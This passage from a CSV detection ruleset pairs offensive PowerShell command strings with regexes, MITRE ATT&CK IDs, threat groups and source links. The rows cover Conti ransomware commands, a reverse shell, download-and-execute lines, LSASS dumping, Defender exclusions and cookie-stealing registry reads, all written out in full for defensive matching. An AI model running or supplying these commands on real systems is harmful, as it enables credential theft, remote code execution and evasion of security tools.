0AGEAXAAnACkAfABPAHUAdAAtAFMAdAByAGkAbgBnACkA.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #3","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008  - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55194"
"*powershell -enc QwBvAHAAeQAtAEkAdABlAG0AIAAtAHAAYQB0AGgAIABjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwARQB4AGMAaABhAG4AZwBlACAAUwBlAHIAdgBlAHIAXABWADEANQBcAEYAcgBvAG4AdABFAG4AZABcAEgAdAB0AHAAUAByAG8AeAB5AFwAbwB3AGEAXABhAHUAdABoAFwAYwB1AHIAcgBlAG4AdABcAHQAaABlAG0AZQBzAFwAUgBlAHMAbwB1AHIAYwBlAEgAYQBuAGQAbABlAHIALgBhAHMAcAB4ACIAIAAtAEYAbwByAGMAZQA7AHMAYwAgAC0AcABhAHQAaAAgAGMAOgBcAGkAbgBlAHQAcAB1AGIAXAB3AHcAdwByAG8AbwB0AFwAYQBzAHAAbgBlAHQAXwBjAGwAaQBlAG4AdABcAHQAZQBzAHQALgB0AHgAdAAgAC0AdgBhAGwAdQBlACAAKABpAGUAeAAoACcAbABzACAAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABFAHgAYwBoAGEAbgBnAGUAIABTAGUAcgB2AGUAcgBcAFYAMQA1AFwARgByAG8AbgB0AEUAbgBkAFwASAB0AHQAcABQAHIAbwB4AHkAXABvAHcAYQBcAGEAdQB0AGgAXABjAHUAcgByAGUAbgB0AFwAdABoAGUAbQBlAHMAXAAiACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA=*",".{0,1000}powershell\s\-enc\sQwBvAHAAeQAtAEkAdABlAG0AIAAtAHAAYQB0AGgAIABjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwARQB4AGMAaABhAG4AZwBlACAAUwBlAHIAdgBlAHIAXABWADEANQBcAEYAcgBvAG4AdABFAG4AZABcAEgAdAB0AHAAUAByAG8AeAB5AFwAbwB3AGEAXABhAHUAdABoAFwAYwB1AHIAcgBlAG4AdABcAHQAaABlAG0AZQBzAFwAUgBlAHMAbwB1AHIAYwBlAEgAYQBuAGQAbABlAHIALgBhAHMAcAB4ACIAIAAtAEYAbwByAGMAZQA7AHMAYwAgAC0AcABhAHQAaAAgAGMAOgBcAGkAbgBlAHQAcAB1AGIAXAB3AHcAdwByAG8AbwB0AFwAYQBzAHAAbgBlAHQAXwBjAGwAaQBlAG4AdABcAHQAZQBzAHQALgB0AHgAdAAgAC0AdgBhAGwAdQBlACAAKABpAGUAeAAoACcAbABzACAAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABFAHgAYwBoAGEAbgBnAGUAIABTAGUAcgB2AGUAcgBcAFYAMQA1AFwARgByAG8AbgB0AEUAbgBkAFwASAB0AHQAcABQAHIAbwB4AHkAXABvAHcAYQBcAGEAdQB0AGgAXABjAHUAcgByAGUAbgB0AFwAdABoAGUAbQBlAHMAXAAiACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA\=.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #4","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008  - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55195"
"*powershell Get-ItemPropertyValue -Path {}:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY*",".{0,1000}powershell\sGet\-ItemPropertyValue\s\-Path\s\{\}\:SOFTWARE\\\\Roblox\\\\RobloxStudioBrowser\\\\roblox\.com\s\-Name\s\.ROBLOSECURITY.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","#registry","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","55196"
"*powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault*",".{0,1000}powershell\sGet\-ItemPropertyValue\s\-Path\s\'HKLM\:SOFTWARE\\\\Microsoft\\\\Windows\sNT\\\\CurrentVersion\\\\SoftwareProtectionPlatform\'\s\-Name\sBackupProductKeyDefault.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","#registry","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","55197"
"*powershell IEX (New-Object Net.WebClient).DownloadString(*)  Get-NetComputer -FullData *",".{0,1000}powershell\sIEX\s\(New\-Object\sNet\.WebClient\)\.DownloadString\(.{0,1000}\)\s\sGet\-NetComputer\s\-FullData\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55198"
"*powershell IEX (New-Object Net.WebClient).DownloadString*.ps1*Get-NetComputer -FullData*",".{0,1000}powershell\sIEX\s\(New\-Object\sNet\.WebClient\)\.DownloadString.{0,1000}\.ps1.{0,1000}Get\-NetComputer\s\-FullData.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55199"
"*powershell Invoke-WebRequest ""http://0.0.0.0:8001/test.exe*",".{0,1000}powershell\sInvoke\-WebRequest\s\""http\:\/\/0\.0\.0\.0\:8001\/test\.exe.{0,1000}","offensive_tool_keyword","POC","Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)","T1190 - T1059 - T1071 - T1105 - T1041","TA0001 - TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","Exploitation tool","https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ","1","0","N/A","N/A","9","2","114","39","2024-01-20T16:59:23Z","2023-11-03T22:06:09Z","55200"
"*powershell Invoke-WebRequest http*.bat *",".{0,1000}powershell\sInvoke\-WebRequest\shttp.{0,1000}\.bat\s.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tool","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A","55201"
"*Powershell LDAPWordlistHarvester*",".{0,1000}Powershell\sLDAPWordlistHarvester.{0,1000}","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","Black Basta","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","0","N/A","N/A","5","","N/A","","","","55202"
"*powershell -nop -c """"$client = New-Object System.Net.Sockets.TCPClient*",".{0,1000}powershell\s\-nop\s\-c\s\""\$client\s\=\sNew\-Object\sSystem\.Net\.Sockets\.TCPClient.{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","0","N/A","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","55204"
"*powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgAyADAANAAxADIALwAnACkAOwAgAC4AXAByAGMAbABvAG4AZQBtAGEAbgBhAGcAZQByAC4AcABzADEA*",".{0,1000}powershell\s\-nop\s\-exec\sbypass\s\-EncodedCommand\sSQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgAyADAANAAxADIALwAnACkAOwAgAC4AXAByAGMAbABvAG4AZQBtAGEAbgBhAGcAZQByAC4AcABzADEA.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #14","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008  - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55205"
"*powershell -w hidden -NoExit -c {start-job -s {while($TRUE){powershell -EnC ((Get-PrintJob XPS).documentname -join '');sleep 60}*",".{0,1000}powershell\s\-w\shidden\s\-NoExit\s\-c\s\{start\-job\s\-s\s\{while\(\$TRUE\)\{powershell\s\-EnC\s\(\(Get\-PrintJob\sXPS\)\.documentname\s\-join\s\'\'\)\;sleep\s60\}.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","55209"
"*powershell*Get-Process keepass*",".{0,1000}powershell.{0,1000}Get\-Process\skeepass.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","55211"
"*powershell.exe -command ""Add-MpPreference -ExclusionExtension "".exe""*",".{0,1000}powershell\.exe\s\-command\s\""Add\-MpPreference\s\-ExclusionExtension\s\""\.exe\"".{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","55214"
"*powershell.exe -command *Enable-PSRemoting -Force* -ComputerName *",".{0,1000}powershell\.exe\s\-command\s.{0,1000}Enable\-PSRemoting\s\-Force.{0,1000}\s\-ComputerName\s.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","55215"
"*powershell.exe -enc $B64ServerScript*",".{0,1000}powershell\.exe\s\-enc\s\$B64ServerScript.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","55217"
"*powershell.exe -noninteractive -executionpolicy bypass ipconfig /all*",".{0,1000}powershell\.exe\s\-noninteractive\s\-executionpolicy\sbypass\sipconfig\s\/all.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #8","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008  - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55224"
"*powershell.exe -noninteractive -executionpolicy bypass ps lsass*",".{0,1000}powershell\.exe\s\-noninteractive\s\-executionpolicy\sbypass\sps\slsass.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #11","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008  - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55225"
"*powershell.exe -noninteractive -executionpolicy bypass quser*",".{0,1000}powershell\.exe\s\-noninteractive\s\-executionpolicy\sbypass\squser.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #10","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008  - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55226"
"*powershell.exe -noninteractive -executionpolicy bypass rundll32.exe C:\windows\System32\comsvcs.dll* MiniDump * C:\programdata\a.zip full*",".{0,1000}powershell\.exe\s\-noninteractive\s\-executionpolicy\sbypass\srundll32\.exe\sC\:\\windows\\System32\\comsvcs\.dll.{0,1000}\sMiniDump\s.{0,1000}\sC\:\\programdata\\a\.zip\sfull.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #13","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008  - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55227"
"*powershell.exe -noninteractive -executionpolicy bypass Start-Process c:\windows\SVN.exe -ArgumentList *-connect * -pass Password1234*",".{0,1000}powershell\.exe\s\-noninteractive\s\-executionpolicy\sbypass\sStart\-Process\sc\:\\windows\\SVN\.exe\s\-ArgumentList\s.{0,1000}\-connect\s.{0,1000}\s\-pass\sPassword1234.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #12","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008  - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55228"
"*powershell.exe -nop -c ""start-job *Import-Module BitsTransfer*$env:temp*GetRandomFileName()*Start-BitsTransfer -Source 'http*Remove-Item*Receive-Job*","powershell\.exe\s\-nop\s\-c\s\""start\-job\s.{0,1000}Import\-Module\sBitsTransfer.{0,1000}\$env\:temp.{0,1000}GetRandomFileName\(\).{0,1000}Start\-BitsTransfer\s\-Source\s\'http.{0,1000}Remove\-Item.{0,1000}Receive\-Job.{0,1000}","offensive_tool_keyword","powershell","deployment of a payload through a PowerShell stager using bits to download","T1197","TA0009","N/A","N/A","Collection","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","55229"
"*powershell.exe -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc *",".{0,1000}powershell\.exe\s\-NoP\s\-NoL\s\-sta\s\-NonI\s\-W\sHidden\s\-Exec\sBypass\s\-Enc\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","55234"
"*powershell.exe -NoP -sta -NonI -W Hidden -Command *Action = New-ScheduledTaskAction -Execute *",".{0,1000}powershell\.exe\s\-NoP\s\-sta\s\-NonI\s\-W\sHidden\s\-Command\s.{0,1000}Action\s\=\sNew\-ScheduledTaskAction\s\-Execute\s.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","0","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","55236"
"*powershell.exe nothing to see here! :-P*",".{0,1000}powershell\.exe\snothing\sto\ssee\shere!\s\:\-P.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","N/A","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","55238"
"*powershell.exe -win hidden -NonI -c (icm -scriptblock ([scriptblock]::Create([System.Text.Encoding]*",".{0,1000}powershell\.exe\s\-win\shidden\s\-NonI\s\-c\s\(icm\s\-scriptblock\s\(\[scriptblock\]\:\:Create\(\[System\.Text\.Encoding\].{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","55242"
"*powershell_code_execution_invoke_assembly*",".{0,1000}powershell_code_execution_invoke_assembly.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55248"
"*powershell_collection_keylogger*",".{0,1000}powershell_collection_keylogger.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55249"
"*powershell_collection_screenshot*",".{0,1000}powershell_collection_screenshot.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55250"
"*powershell_command_x64.ps1*",".{0,1000}powershell_command_x64\.ps1.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","55251"
"*powershell_command_x86.ps1*",".{0,1000}powershell_command_x86\.ps1.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","55252"
